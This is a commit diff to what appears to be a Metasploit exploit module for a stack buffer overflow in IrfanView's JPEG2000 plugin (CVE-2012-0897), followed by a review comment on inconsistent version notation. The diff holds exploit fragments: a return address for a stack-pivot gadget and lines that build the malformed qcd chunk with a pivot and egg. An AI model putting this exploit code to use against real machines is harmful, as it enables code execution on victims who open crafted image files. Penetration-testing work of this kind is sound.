last cleanup

unstable
jvazquez-r7 2012-06-30 14:18:25 +02:00
parent 19d476122b
commit 5dbfb7b9aa
1 changed files with 6 additions and 9 deletions


@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. The vulnerability is
triggered via parsing an invalid qcd chunk structure and specfiying a
malformed qcd size and data.
version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
tested on a specific version of irfanview (v4.3.2), although other versions may
work also. The vulnerability is triggered via parsing an invalid qcd chunk
structure and specifying a malformed qcd size and data.
Payload delivery and vulnerability trigger can be executed in multiple ways.
The user can double click the file, use the file dialog, open via the icon
@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2012-0897' ],
[ 'OSVDB', '78333'],
[ 'BID', '51426' ],
[ 'URL', 'http://www.greyhathacker.net/?p=525' ]
[ 'URL', 'http://www.greyhathacker.net/?p=525' ],
],
'Platform' => [ 'win' ],
'DefaultOptions' =>
@ -59,10 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
# push esp; retn [i_view32.exe]
[ 'Irfanview 4.33 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x0049a6b4 } ],
[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
],
'DisclosureDate' => 'Jun 24 2011',
'DisclosureDate' => 'Jan 16 2012',
'DefaultTarget' => 0))
register_options(
@ -179,9 +179,6 @@ class Metasploit3 < Msf::Exploit::Remote
pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string
# pass 'cmp dword ptr [eax+ebx*4],ebp'
pivot << "\xff\x66" # we use this to reach the end of our function
qcd_data << encode_bytes(pivot)
qcd_data << egg
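Review bot: The reworded description in the first hunk gives the tested release as `irfanview (v4.3.2)`, which matches neither the `4.32` in the remaining target entry nor the plugin version `4.3.2.0` in the name and opening sentence, so a reader cannot tell whether the application or the JPEG2000 plugin is meant. The +/- markers are lost on this page, so I am assuming the copy that contains "tested on a specific version" is the new side. I would reuse the target's notation, e.g. `tested on IrfanView 4.32 (plugins 4.32), although other versions may also work`, because people matching CVE-2012-0897 against installed software rely on this text to identify affected builds. The info hash holding this text starts and ends outside the visible hunks.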